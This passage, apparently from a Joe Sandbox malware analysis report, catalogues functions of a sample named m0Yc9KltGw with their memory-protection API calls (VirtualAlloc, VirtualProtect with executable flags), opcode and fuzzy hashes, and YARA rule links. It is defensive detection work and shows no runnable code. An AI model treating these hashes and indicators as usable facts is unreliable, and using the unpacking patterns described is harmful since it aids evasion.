                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: 30559fc6edc30292f71436ff35849a0efc35f25c77b9a027d745df5b188eb6f5
                                • Instruction ID: 3f9854573aa3f4f875f2be634f5af35ad03541d31cf3f2676178343026a3015f
                                • Opcode Fuzzy Hash: 30559fc6edc30292f71436ff35849a0efc35f25c77b9a027d745df5b188eb6f5
                                • Instruction Fuzzy Hash: FE213C71E013289BEB348A55DC49BAAB778FF89711F1041E9E50DA6280D7B4AEC48F51
                                Function 02929277 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: c9e9d60796e34556f200bd6a716c454024d9d333e113249fbe87a89e28d56435
                                • Instruction ID: 01c704bbeca4ddc75a3aacfe35d180a74791477d9c45b2d655286ce18423510f
                                • Opcode Fuzzy Hash: c9e9d60796e34556f200bd6a716c454024d9d333e113249fbe87a89e28d56435
                                • Instruction Fuzzy Hash: D4119671F013289BFB748A51DC09BABB778EF89711F1041E9B50DA6280D6B4AEC4CF51
                                Function 0296AAEC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: =NEK
                                • API String ID: 4275171209-889289970
                                • Opcode ID: f4590bcc777d3cf2344df50e0cc7f97c6cc20789ec8e6a00cac7209edc855156
                                • Instruction ID: 5eba88f72df1417d964e2d671a86407a96f45614fc4dc13a0dffc516b86a1d0f
                                • Opcode Fuzzy Hash: f4590bcc777d3cf2344df50e0cc7f97c6cc20789ec8e6a00cac7209edc855156
                                • Instruction Fuzzy Hash: 4DE09271948228AEF7345A54DC6DFB97BF8E704324F0004DAFF4DA9180D6795BC08A51
                                Function 004050BB Relevance: 1.8, APIs: 1, Instructions: 250COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6225a97c7845c0404e9d8cb3d22aa40c97df8859f9ba5730e454e3682008a16f
                                • Instruction ID: c9fc342e277669f83b1f9d1630e6c9e80e5342e06adbcc95b1671853f3025f8e
                                • Opcode Fuzzy Hash: 6225a97c7845c0404e9d8cb3d22aa40c97df8859f9ba5730e454e3682008a16f
                                • Instruction Fuzzy Hash: F9917EB1D046289FF7208A14DC95BFB7778EB45324F1442FBE80EA6280D67D6EC18E56
                                Function 02941EFC Relevance: 1.7, APIs: 1, Instructions: 233COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8714b9b534637637358d79422eb6ab67fe36c701d4589f8bc32b2af85d2b647
                                • Instruction ID: 81cb17333c804d56f1ea1b67a54c8f32d57aedab19deefcd777344923c7dacd1
                                • Opcode Fuzzy Hash: f8714b9b534637637358d79422eb6ab67fe36c701d4589f8bc32b2af85d2b647
                                • Instruction Fuzzy Hash: 4891F1B1E082989EFB218B24DC00BEA7736EF85300F1480F9D54D97681D77A5EC68B66
                                Function 02941F08 Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74facc3cdfd261eb8c810a86b42faa5e28d05126264c13a8e1bee6c097af86b0
                                • Instruction ID: feed9ef1d9f9bcf1ef295751790b614df519a6f005ff0dc5d78b94ef9566c83d
                                • Opcode Fuzzy Hash: 74facc3cdfd261eb8c810a86b42faa5e28d05126264c13a8e1bee6c097af86b0
                                • Instruction Fuzzy Hash: 0B91E2B1E082A89AFB208B24DC04BEA7736EF85300F1480F9D54D57681D77A5FC68F66
                                Function 02941F0E Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbf1244221179ec5da7f700d58d13b3f47b26928e85b999550c8bf86659e40e8
                                • Instruction ID: 579450907e05c55bdcd6ba91f1064ee4a38a1092e13bc6c814df5f9756e00e7e
                                • Opcode Fuzzy Hash: cbf1244221179ec5da7f700d58d13b3f47b26928e85b999550c8bf86659e40e8
                                • Instruction Fuzzy Hash: A291F2B1E082A89AFB208B24DC44BEA7736EF85300F1480F9D54D57681D77A5FC68F66
                                Function 02941F15 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 858d48d9f1f4e877935908a8fdc234b2252d6ec31b6fe576ad7bf328454bcea3
                                • Instruction ID: 34ae39a155bccfa31952739fa9c859f1c5ba0f5db22f1a32aea131e7101aef46
                                • Opcode Fuzzy Hash: 858d48d9f1f4e877935908a8fdc234b2252d6ec31b6fe576ad7bf328454bcea3
                                • Instruction Fuzzy Hash: 3391F2B1E082A89AFB208B24DC04BEA7776EF85300F1480F9D54D57681D77A5FC68F66
                                Function 00405382 Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c0430e117991581ed697ca8845e7a386ffc158c88b85485b8b5f89407aa3512
                                • Instruction ID: 09f5f11686064701df66a5e6a4a003da236dd83e313d481306864e63d302f757
                                • Opcode Fuzzy Hash: 1c0430e117991581ed697ca8845e7a386ffc158c88b85485b8b5f89407aa3512
                                • Instruction Fuzzy Hash: 5B81C2B1D146289FE724CB10DC81AFB7779EF85310F1441FAD80EA6280E6786EC18F66
                                Function 004054B6 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8774ac32f06f9694be791e1b83653c54d986bf106f10c7acc50470aab82b1a2f
                                • Instruction ID: 6b5de029b82fb8664f7bbb76461c519d6ddba0b1cb178415c1f1ef339fbfee7d
                                • Opcode Fuzzy Hash: 8774ac32f06f9694be791e1b83653c54d986bf106f10c7acc50470aab82b1a2f
                                • Instruction Fuzzy Hash: F581A0B1D045289FE7248B14DC91AFB7779EF44310F1441FAE80EA6280E67D6EC18F66
                                Function 02941FB8 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 27783f233b4d700ff4e14421e525cc9f573d11608b0da8b168bc24f81c5bae6f
                                • Instruction ID: 4594232468637d93650c498e46309855ec4534269b5103c2fad69fb5c8734664
                                • Opcode Fuzzy Hash: 27783f233b4d700ff4e14421e525cc9f573d11608b0da8b168bc24f81c5bae6f
                                • Instruction Fuzzy Hash: 8B81F2B1E082A89AFB218B24DC04BEB7775EF85300F1440F9D54D67681D77A5FC68B26
                                Function 02941FC4 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: c5aa0f7647fc7878ab4ba94032d120def268420eb826c7b962d0e78732827a05
                                • Instruction ID: 12cfd179aa1c0423f29509d4488b9d45b97dbe40dbb334b5802eac43bdd29d4a
                                • Opcode Fuzzy Hash: c5aa0f7647fc7878ab4ba94032d120def268420eb826c7b962d0e78732827a05
                                • Instruction Fuzzy Hash: 2081E2A1E082A89EFB218B24DC04BEB7735EF85300F1440F9D54D67681D77A5FC58B26
                                Function 02942430 Relevance: 1.7, APIs: 1, Instructions: 204memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: aa2b10953dfc317e25285b38908e209a19f38568f7c906598eb5706ab99e518e
                                • Instruction ID: be832c2f4d1c407c52dc765a9e4d23780393c1b96eed571e2724c1d660d14f2c
                                • Opcode Fuzzy Hash: aa2b10953dfc317e25285b38908e209a19f38568f7c906598eb5706ab99e518e
                                • Instruction Fuzzy Hash: EC61ADB2E042599BEB248B25DC44FFAB779FBC4310F1581FAE80D96640E6385BC5CA51
                                Function 0040571B Relevance: 1.7, APIs: 1, Instructions: 202memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b6384b1a6f6fc57015385a9d83e57be70988c7f87d6295e339684477480480a5
                                • Instruction ID: 15b6f3f21f58dcf8630ec38a8d637f875a1143634992b262ff56cc754137e502
                                • Opcode Fuzzy Hash: b6384b1a6f6fc57015385a9d83e57be70988c7f87d6295e339684477480480a5
                                • Instruction Fuzzy Hash: 65816CB1E046288BEB24CA14DC90AFBB7B5EF45311F1481FBD84E67281D6396FC18E95
                                Function 02941F68 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 8d4aa20c57e82cde08491bfe67fecc176b9a451b8e78ff95d789b35af01975fb
                                • Instruction ID: 712b7050140dfba8151c9a853c06bea35c4f6012193d891953f1430a6ef94fa6
                                • Opcode Fuzzy Hash: 8d4aa20c57e82cde08491bfe67fecc176b9a451b8e78ff95d789b35af01975fb
                                • Instruction Fuzzy Hash: B881E3B1E082A89EFB218B24DC04BEA7736EF95300F1440F9D54DA7681D77A5FC58B26
                                Function 029421A0 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 5e4210f8f26634a21f860ca6995a119793206ffe45693aa6c78f93b3b1aad331
                                • Instruction ID: 4f049a0f5c501c802f0624c445e1dea8341af66c4e91abe78c95119df97bd5ac
                                • Opcode Fuzzy Hash: 5e4210f8f26634a21f860ca6995a119793206ffe45693aa6c78f93b3b1aad331
                                • Instruction Fuzzy Hash: CB81E3B1E082A89AFB218B24DC04BEB7736EF95300F1440F9D54DA7681D77A5FC58B26
                                Function 004053CE Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ff36e0bb2883003c29a380a2df501432fba59c3581e119c0aefc97d11f724e7
                                • Instruction ID: ca91b741001d20a94d7459214fe2d957509fc0de5e8a0c527c23d6c9388534fd
                                • Opcode Fuzzy Hash: 9ff36e0bb2883003c29a380a2df501432fba59c3581e119c0aefc97d11f724e7
                                • Instruction Fuzzy Hash: EA71AEB1D046289FE720CA14DC95AFB7779EF84310F1441FAE84DA6280E67D6EC18F66
                                Function 004051F6 Relevance: 1.7, APIs: 1, Instructions: 197memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 22352a0b415d00e70a267192952c5b8310c6532f1b1cd3105b4b01e4c844cbc1
                                • Instruction ID: bda645420988400695dd9759aa45f577f4306f6e69b6d29db1ff3b33cebb4942
                                • Opcode Fuzzy Hash: 22352a0b415d00e70a267192952c5b8310c6532f1b1cd3105b4b01e4c844cbc1
                                • Instruction Fuzzy Hash: 64619FF2E106189FF7108A14DC95EFB7778EB84310F1441BAE90EA6280D67D6FC58E66
                                Function 00405267 Relevance: 1.7, APIs: 1, Instructions: 168memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: e439f20150d50c4929d6edbff225b94139b1c82ae7ba520565f358d259c97875
                                • Instruction ID: 0efbc501fccad9c5e30cd9e683b6ac533d40e0bb03300e56b7f9eb4486f46065
                                • Opcode Fuzzy Hash: e439f20150d50c4929d6edbff225b94139b1c82ae7ba520565f358d259c97875
                                • Instruction Fuzzy Hash: 255190B2E046189FF7108A14DC95EFB7778EB84320F1441FAE90E66280D67D6FC58E66
                                Function 0041E3C7 Relevance: 1.7, APIs: 1, Instructions: 167memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0041E720
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: f14c0a7ff0fa85786e15260b031bbb6a3870be62f4fd49c9397990994ed6c3d2
                                • Instruction ID: 8ccf6735f620bc94cdb0017120b44ef3f0b455e627dd689fdd24e4da842eca9c
                                • Opcode Fuzzy Hash: f14c0a7ff0fa85786e15260b031bbb6a3870be62f4fd49c9397990994ed6c3d2
                                • Instruction Fuzzy Hash: 338158B4D04569CBDB28CB15DC90BEAB7B1BB98305F6481EAD80D6B341D638AEC1CF45
                                Function 00405465 Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 337b589e4aa83fdd0f5da0a5cbe643a3c8d7f19587df7e8bc2ff07e91d6c9e02
                                • Instruction ID: 9773349eadcf9c9cabda163043ef23e23c442afd6f01ed25f527f2e6e3cf2349
                                • Opcode Fuzzy Hash: 337b589e4aa83fdd0f5da0a5cbe643a3c8d7f19587df7e8bc2ff07e91d6c9e02
                                • Instruction Fuzzy Hash: 2751C1F1D045289FF7148A14DC85AFB7779EB80310F1441BAE80E62680E67D6FC18E56
                                Function 0294297E Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f2182f45c730d21ae2124fa661f2240de87776d7c0fbe574146118705e7f7dca
                                • Instruction ID: b92dcca9119338d204c8100f69c8b862f5cac17365234aa484b8e6ffbb8e1cdf
                                • Opcode Fuzzy Hash: f2182f45c730d21ae2124fa661f2240de87776d7c0fbe574146118705e7f7dca
                                • Instruction Fuzzy Hash: 6751D3B2D051149AFB208B24DC84FFA777AFB84310F1485FAE90D96680DB399BC5CE51
                                Function 004052C0 Relevance: 1.6, APIs: 1, Instructions: 148memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: c4e13d46f98c3ce0c9d0ef7cd97983ca4be23db19f4d276e6c850cda9757f96e
                                • Instruction ID: 78b38dee33307bb44dd798618c0ba56674ed81f6263c2d4366b59cbc5491fd6c
                                • Opcode Fuzzy Hash: c4e13d46f98c3ce0c9d0ef7cd97983ca4be23db19f4d276e6c850cda9757f96e
                                • Instruction Fuzzy Hash: 38419EF1E046289FF7548A00DC95EFB7778EB40320F1442BAE90E66280D67D6FC58E66
                                Function 02942316 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b218b66414181149589370530dd6661d18077e48ac86a88611cbd7b662dfcfd2
                                • Instruction ID: 11e6b7e8e0788204eda3139dce38f48531ba7399d3a03546fba2cbf6e4c7b550
                                • Opcode Fuzzy Hash: b218b66414181149589370530dd6661d18077e48ac86a88611cbd7b662dfcfd2
                                • Instruction Fuzzy Hash: 495157B2E082989EFB218624DC44BEB7B75EB85300F1880F9D84D56681D77E5FC58F22
                                Function 029429CA Relevance: 1.6, APIs: 1, Instructions: 141memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: de97ce1796b9f434fef2cc4dd61238e5a141845cd1afb5ad074f6b76357c7563
                                • Instruction ID: 49e82ec254e3afddcb9a986b982aa1eea2d2e9b2a0b76e59c553e75a2aaa21f2
                                • Opcode Fuzzy Hash: de97ce1796b9f434fef2cc4dd61238e5a141845cd1afb5ad074f6b76357c7563
                                • Instruction Fuzzy Hash: E141D3B2D041149BFB208B24DC54FFB777AEB84310F1086FAE90996680DB399BC1CE11
                                Function 004052E3 Relevance: 1.6, APIs: 1, Instructions: 136memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ae3c7c338da1a2bcc6278cde4ff069c74e09636217319eaf6b647f57b1633853
                                • Instruction ID: 40bff6c0c73c513f88b5f311263a2be726fb0cee04d09d9cc5aeac4900255808
                                • Opcode Fuzzy Hash: ae3c7c338da1a2bcc6278cde4ff069c74e09636217319eaf6b647f57b1633853
                                • Instruction Fuzzy Hash: 95419DB1D04228AFF7508A14DC95EFB7B78EB40310F1441FAE90EA6280D67D6FC18E56
                                Function 029423C8 Relevance: 1.6, APIs: 1, Instructions: 136memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 9d4a7f59cfbb7d0c1fd59f1a0130168f1a093e3890c1f7d32fb9fdcd61b70ac6
                                • Instruction ID: 8f485d9a53607fc6053f4b65a70f043add14dee1a2b7c651269fe1db7fb60888
                                • Opcode Fuzzy Hash: 9d4a7f59cfbb7d0c1fd59f1a0130168f1a093e3890c1f7d32fb9fdcd61b70ac6
                                • Instruction Fuzzy Hash: 2641B2B2E04158ABFB218A24DC44FFBB739FBC5714F1581F9E80D56640D7399AC68E22
                                Function 00405354 Relevance: 1.6, APIs: 1, Instructions: 129memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: bb76387ffe17a116e93a69d77dc2c1345552ce288955766f84b4c6236dce22fb
                                • Instruction ID: f3a7785ba762c3d7a044ddebc3420adef200da1eb7b73602ffffc0bc9d1c3431
                                • Opcode Fuzzy Hash: bb76387ffe17a116e93a69d77dc2c1345552ce288955766f84b4c6236dce22fb
                                • Instruction Fuzzy Hash: 48419CF1D14628AFF7548A04DC95EFB7778EB44320F1441BAE90EA2280D67D6FC18E66
                                Function 02962E7A Relevance: 1.6, APIs: 1, Instructions: 127memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 9aa13cec101168e0c92ffb56c89b2f6c0e6af0ab85b04f79d3c178ed6a3674be
                                • Instruction ID: dd8d642370223e75cfeab6d17f76346d2e5e521a4270ebc533b5ead4e70d121a
                                • Opcode Fuzzy Hash: 9aa13cec101168e0c92ffb56c89b2f6c0e6af0ab85b04f79d3c178ed6a3674be
                                • Instruction Fuzzy Hash: A241EBB2D442689FE7208B24DC98BEABBB5EB94310F0441F9D94D67280C7395EC1CF91
                                Function 02922E23 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 7bdea02f5c2ce6a6c89ce1cda042d89e016c5a06c66e2461922b9996a03c7e4e
                                • Instruction ID: d45d6b2bedb439376443652d982afe5623d51604a0b2d6584a09dfa3f149d7fd
                                • Opcode Fuzzy Hash: 7bdea02f5c2ce6a6c89ce1cda042d89e016c5a06c66e2461922b9996a03c7e4e
                                • Instruction Fuzzy Hash: 5141D4B1C041759FE724DB64DC44AEB7BB9EB41310F0085FAE84D66284D6399EC9CF91
                                Function 02942BEF Relevance: 1.6, APIs: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: aad947af98e30362e86e2b92d8b3205b88aba3b9e0c8fad8c88fe1fd8f4e81e2
                                • Instruction ID: 2117712d02e4509b662fa567c01e68f645e9717f4ad00fbc8c18b868f2c8351d
